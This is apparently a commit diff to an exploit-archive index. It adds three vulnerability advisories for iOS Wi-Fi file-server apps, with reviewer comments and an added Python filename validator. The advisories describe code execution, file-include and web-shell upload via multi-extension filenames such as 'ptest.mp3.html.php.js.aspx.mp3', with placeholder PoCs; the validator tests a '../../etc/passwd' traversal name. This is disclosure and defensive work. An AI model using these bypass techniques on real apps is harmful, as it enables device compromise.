Updated 03_29_2014
parent b4268e8a98
commit 211b2f8394
7 changed files with 1297 additions and 1 deletions
@ -9467,7 +9467,7 @@ id,file,description,date,author,platform,type,port
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80
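Review bot: the only change in this hunk is the 10099 description gaining the " - " separator between product and exploit title, which brings it in line with the 10097 and 10101 rows; the unchanged 10096, 10098, 10100 and 10102 rows in the same context still use the separator-less form, so if the goal is a consistent description style those rows need the same treatment, and the commit message "Updated 03_29_2014" gives no hint that this one-character normalisation is intended.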
@ -29318,3 +29318,9 @@ id,file,description,date,author,platform,type,port
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619
32557,platforms/hardware/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32558,platforms/hardware/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80
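Review bot: the 32559 row's description "Easy FileManager 1.1 iOS - Multiple Vulnerabilities" does not match the document title inside platforms/hardware/webapps/32559.txt, which reads "Easy FileManager 1.1 iOS - Multiple Web Vulnerabilities"; the 32557 and 32558 rows do match their files, so this one should be aligned before the index is published. Two smaller points: the date column of all six new rows is 2014-03-27 while the advisories themselves carry release dates of 2014-03-20, 2014-03-21 and 2014-03-25, which is fine if the column records the archive date but is worth stating somewhere, and the three iOS Wi-Fi file-server apps are filed under platform "hardware" with port 8080 while 32556, also a web application, is filed under "multiple"; the classification rule behind that choice is not visible from the rows themselves.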
163
platforms/hardware/webapps/32557.txt
Executable file
@ -0,0 +1,163 @@
Document Title:
===============
FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1231


Release Date:
=============
2014-03-20


Vulnerability Laboratory ID (VL-ID):
====================================
1231


Common Vulnerability Scoring System:
====================================
9.1


Product & Service Introduction:
===============================
FTP Drive + HTTP Server is the ultimate app as for usefullness and ease of use to bring with you and share all your
important files through your iPhone/iPod! When you`re in a hurry or simply wants the things done as they are supposed
to be done, you can use FTP Drive + HTTP Server. As the name implies, you can use this app mainly as an FTP Server,
so you can mount it as a Network Drive in your favorite operative system or you can browse the files through a web
browser like Firefox, Safari, Chrome, Internet Explorer, ...

(Copy of the Homepage: https://itunes.apple.com/us/app/ftp-drive-+-http-server-easiest/id455671784 )
(Vendor Homepage: http://www.gummybearstudios.com/ios.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered a code execution web vulnerability in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-03-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A code execution web vulnerability has been discovered in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
The remote vulnerbaility allows an attacker to compromise the application and connected device components by usage of a system specific command execution.

The vulnerability is located in the create folder input field. The input field direct executes the input via GET method request. The request has only a simple
quotes encoding. Remote attackers are easily able to execute code by usage of a script code payload in combination with system device specific php code values.
The execution of the code occurs in the main index file dir listing service context. The attack vector is on application-side and the request method to attack
the service is GET. To bypass the path values validation it is required to first add a folder via `newDir` value. The remote attacker is able to tamper the
create new folder post method request and can intercept the values twice to attach the second manipulated path value to provoke a code execution. After the
add it is possible to attach to the already included values via create new folder to execute the code. The security risk of the remote code execution web
vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.0(+)|(-)9.1.

Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected component compromise.

Vulnerable Module(s):
[+] Create New Folder

Vulnerable Parameter(s):
[+] path value


Proof of Concept (PoC):
=======================
The php code execution web vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.

PoC:
http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[3173] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[3173]
Date[Mi., 19 M?r. 2014 15:06:04 GMT]




Solution - Fix & Patch:
=======================
The code execution web vulnerability can be patched by a secure parse of the create new folder input field.
Adjust the encoding of the affected foldername output context value in the main index file dir list.


Security Risk:
==============
The security risk of the remote code execution web vulnerability in the create new folder module is estimated as critical.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

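Review bot: the Affected Product(s) section of this file is empty (only the heading and its underline), unlike 32559.txt in the same commit, so the vendor and version are only recoverable from the abstract; it should carry the "Gummy Bear Studios" / "FTP Drive + HTTP Server 1.0.4" values that the abstract already states. On substance, the PoC and session log show the `newDir` GET parameter being reflected into the index directory listing with only quote encoding, which is the root cause the Solution section should name: validate the new folder name server-side (reject path separators and markup rather than encoding a single character) and apply context-appropriate output encoding when the name is written into the listing; "a secure parse of the create new folder input field" is too vague to act on. Two style points: "vulnerbaility" in the first Technical Details paragraph, and the Date response header and the "Gr??e des Inhalts" log label carry mojibake from the original capture.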
262
platforms/hardware/webapps/32558.txt
Executable file
@ -0,0 +1,262 @@
Document Title:
===============
Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1233


Release Date:
=============
2014-03-21


Vulnerability Laboratory ID (VL-ID):
====================================
1233


Common Vulnerability Scoring System:
====================================
7.1


Product & Service Introduction:
===============================
WiFi Music lets you transfer via Wi-Fi the songs you have in your computer to any iPhone, iPod touch or iPad
in your network. No iTunes required. Now you can share them with your friends and workmates, and stream them
directly to almost any media player!

( Copy to the Vendor Homepage: https://itunes.apple.com/de/app/wifi-music/id469617062 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple critical vulnerabilities in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-03-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.

The web vulnerability is located in the `filename` value of the `Upload File` module. Remote attackers are able to inject own files with
malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and
the request method is POST. The local file/path include execution occcurs in the main music file dir list. The security risk of the local
file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8.

Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with
low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device
component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Select File > Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Music File Dir List (http://localhost:8080/)



1.2
An arbitrary file upload web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `upload` (video and music) module. Remote attackers are able to upload a php or js web-shells by renaming
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
and extension `ptest.mp3.html.php.js.aspx.mp3`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .mp3 file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.7(+)|(-)7.8.

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Select File > Upload

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Music File Dir List (http://localhost:8080/)


Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: iChm File Management - Index

<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead><tbody id="filelist">
<tr><td><a href="/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E" class="file"><./[LOCAL FILE INCLUDE VULNERABILITY!]"></a></td>
<td class='del'><form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E' method='post'><input name='_method' value='delete'
type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>


Source: Vulnerable Java Script (iChm File Management - Index)

<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td class='del'>
<form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=\"commit\"
type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>


--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------280732177711982
Content-Disposition: form-data; name="newfile"; filename="<./[LOCAL FILE INCLUDE WEB VULNERABILITY!]>"
Content-Type: image/png

Reference(s):
http://localhost:8080/[Index File Dir Listing]



1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.

PoC: http://localhost:8080/files/[ARBITRARY FILE UPLOAD PATH]-ptest.mp3.html.php.js.aspx.mp3`

--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------141831923231387
Content-Disposition: form-data; name="newfile"; filename="ptest.mp3.html.php.js.aspx.mp3"
Content-Type: image/jpeg

Reference(s):
http://localhost:8080/files


Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Filter and encode also the filename output listing of the index.

1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
Reset the executable rights for html and php codes in the little web-server settings config for /files.


Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(-).

1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

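Review bot: the PoC for issue 1.1 is headed "iChm File Management - Index" and the quoted script is labelled "Vulnerable Java Script (iChm File Management - Index)", which does not match the document title "Lazybone Studios WiFi Music 1.0 iOS"; either the label is a copy-paste leftover from another advisory or the wrong listing was captured, and it should be checked before this file ships. The quoted script pins the defect down better than the prose does: `item.name` is concatenated raw into the row markup while only the href goes through `encodeURI`, and the `.replace("'", "'")` call as quoted replaces a quote with itself, so the 1.1 fix should say "HTML-encode the filename when rendering the listing" rather than "secure parse and encode". The description also calls this a local file include although what the PoC demonstrates is an unencoded filename rendered into a listing, the header says Exploitation Technique "Local" while every paragraph speaks of remote attackers, the Affected Product(s) section is empty, and "occcurs" appears in the 1.1 description.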
250
platforms/hardware/webapps/32559.txt
Executable file
@ -0,0 +1,250 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Easy FileManager 1.1 iOS - Multiple Web Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1234
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-25
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1234
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
7.9
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
This is a file management app which is very easy to use. You can manage your files under the specified directory, including copy,
|
||||||
|
cut, paste, delete, rename and create new directory. Preview the picture and play audio and video directly from the folder are supported.
|
||||||
|
This app also includes a simple FTP client. Users can use this client to connect to the remote ftp server, upload and download files from
|
||||||
|
the remote ftp server. It also includes a FTP Server and a HTTP Server. When you start the FTP Server, you can use common FTP client or
|
||||||
|
windows explorer to connect to the iphone via wifi. Also, when you start the HTTP Server, you can use internet browser to connect to the
|
||||||
|
server via wifi. It makes your iphone as a portable U disk. It’s really easyt to use this app. The function buttons are clearly. Also,
|
||||||
|
you can just long click the screen to get the action list.
|
||||||
|
|
||||||
|
(Copy of the Homepage: https://itunes.apple.com/de/app/easy-file-manager/id487524125 )
|
||||||
|
(Vendor Homepage: http://www.easytimestudio.com/ )
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-03-25: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Easytime Studio
|
||||||
|
Product: Easy File Manager - iOS Mobile Web Application 1.1
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
The issue allows remote attackers to include unauthorized local file/path values or system-specific path strings through the upload
request, which can be used to compromise the web-application or the mobile device.

The web vulnerability is located in the `filename` value of the `Upload File > Send Data` module. Remote attackers are able to upload
their own files with a manipulated `filename` value in the multipart upload POST request to compromise the mobile web-application. The
filename is not sanitized, so an attacker who intercepts the upload request can tamper with the vulnerable filename value and submit a
path value (for example one starting with `./`) as the file name. The request method is POST and the attack vector is application-side
on the Wi-Fi share function of the iOS application. The injected local file/path value is rendered and resolved in the main directory
listing (dir list). The security risk of the local file include web vulnerability is estimated as high(+) with a CVSS (Common
Vulnerability Scoring System) count of 7.8(+)|(-)7.9.

Exploitation of the local file include web vulnerability requires no user interaction and no privileged web-application user account.
Successful exploitation of the local file include web vulnerability results in compromise of the mobile application or of connected device components.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Select File > Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Directory Dir List (http://localhost:8080/)



1.2
An arbitrary file upload web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `Upload File > Send Data` (resources & files) module. Remote attackers are able to upload php or js
web-shells by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads, for example, a
web-shell with the name `ptest.txt.html.php.js.aspx.txt`, which passes the file restriction. After the upload the attacker opens the file
via its path value in the web application, removes the trailing `.txt` extension and can then access the uploaded code with elevated
executable access rights. The security risk of the arbitrary file upload web vulnerability is estimated as high(+) with a CVSS (Common
Vulnerability Scoring System) count of 6.9(+)|(-)7.0.

Exploitation of the arbitrary file upload web vulnerability requires no user interaction and no privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access and, after the upload of web-shells, compromise of the application.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload File

Vulnerable Function(s):
[+] Send Data

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Directory Dir List (http://localhost:8080/)



Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (UI password blank).
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below.

PoC: Local File Include Vulnerability
http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/[LOCAL FILE INCLUDE VULNERABILITY!]


--- PoC Session Logs [POST] ---

Status: 200[OK]
POST http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content size[1807] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------881557262072
Content-Disposition: form-data; name="uploadfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png



1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (UI password blank).
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below.

PoC: Arbitrary File Upload Vulnerability (Upload File)
http://localhost:8080/private/var/./.\[http://localhost:8080/private/var/mobile/Applications/]+File


--- PoC Session Logs [POST] ---

Status: pending[]
POST http://localhost:8080/private/var Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/private/var]
POST data:
POST_DATA[-----------------------------245202094720816
Content-Disposition: form-data; name="uploadfile"; filename="test.jpg.html.php.asp.html.jpg"
Content-Type: image/jpeg

Note: After the upload to the private /var folder the attacker is able to attach the document path with the file to compromise the web-server.



Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by securely parsing and encoding the vulnerable `filename` value of the upload
file POST request: reduce the name to a single path component and reject path separators and `..` sequences before it is stored.
Filter and encode also the filename output in the index listing.

1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
Implement a secure exception handling that restricts and disallows files with multiple extensions.
Remove the executable rights for html and php content in the little web-server configuration for /files.



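The following Python example is added by the editor and is not code from Easy File Manager or from Vulnerability Lab. It implements the two server-side checks the fix above calls for: the multipart `filename` is reduced to a single plain path component (so a value such as `./[...]` or `../x` is refused instead of being written into, and later listed from, the share root), and a name carrying more than one extension, or any executable extension, is rejected before storage. The allowed and blocked extension sets, the function names and the sample names are assumptions for the example.

```python
"""Upload filename policy for a WiFi file share.

Editor's added example (not Easy File Manager code). It applies the two fixes
proposed above on the server side: the multipart `filename` must be a single,
plain path component, and it may carry exactly one non-executable, allowed
extension. Extension sets and sample names are assumptions for the example.
"""
import re

# Extensions the share is willing to store and serve back (assumption).
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "jpeg", "gif", "pdf", "mp4", "mov"}
# Extensions that are refused wherever they appear in the name (assumption).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php5", "phtml", "asp", "aspx", "jsp",
                         "js", "html", "htm", "cgi", "sh", "pl", "py"}
# Printable ASCII only; must start with a letter or digit; no separators.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._ -]{0,127}$")


class UploadRejected(ValueError):
    """Raised when the client-supplied filename fails policy."""


def validate_upload_filename(raw_name: str) -> str:
    """Return the name to store for `raw_name`, or raise UploadRejected.

    Two independent checks:
      1. path handling: the value must be one path component, so './x',
         'a/b', '..', backslashes and NUL bytes are refused rather than
         written into (and listed from) the share root;
      2. extension handling: every dotted segment after the first is an
         extension, so 'ptest.txt.html.php.js.aspx.txt' is refused even
         though its last extension on its own would be allowed.
    """
    if not raw_name or "\x00" in raw_name:
        raise UploadRejected("empty name or NUL byte")
    candidate = raw_name.strip().replace("\\", "/")   # treat \ like / (Windows clients)
    if "/" in candidate or candidate in (".", ".."):
        raise UploadRejected("path separators or traversal in filename")
    if not _SAFE_NAME.match(candidate):
        raise UploadRejected("filename contains characters outside the allowed set")

    extensions = candidate.lower().split(".")[1:]      # everything after the base name
    if not extensions:
        raise UploadRejected("filename has no extension")
    if len(extensions) > 1:
        raise UploadRejected("multiple extensions are not allowed")
    ext = extensions[0]
    if ext in EXECUTABLE_EXTENSIONS or ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} is not allowed")
    return candidate


def is_accepted(raw_name: str) -> bool:
    """True when `raw_name` passes the policy, False otherwise."""
    try:
        validate_upload_filename(raw_name)
    except UploadRejected:
        return False
    return True


if __name__ == "__main__":
    # Names taken from the PoC requests above plus a few benign ones.
    for name in ("./[LOCAL FILE INCLUDE VULNERABILITY!]", "ptest.txt.html.php.js.aspx.txt",
                 "test.jpg.html.php.asp.html.jpg", "../../etc/passwd", "holiday.JPG", "notes.txt"):
        print(f"{name!r:45} -> {'accepted' if is_accepted(name) else 'rejected'}")
```

The check is deliberately an allowlist: anything that is not a single, known, non-executable extension is refused, which is what makes the `.txt` rename trick in 1.2 ineffective.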
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).

1.2
